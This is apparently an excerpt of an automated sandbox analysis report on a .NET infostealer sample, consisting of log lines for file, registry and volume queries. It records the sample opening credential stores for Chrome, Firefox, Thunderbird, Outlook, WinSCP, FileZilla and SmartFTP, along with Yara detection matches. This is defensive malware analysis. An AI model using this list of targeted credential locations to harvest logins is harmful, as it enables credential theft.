              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: Yara match | File source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
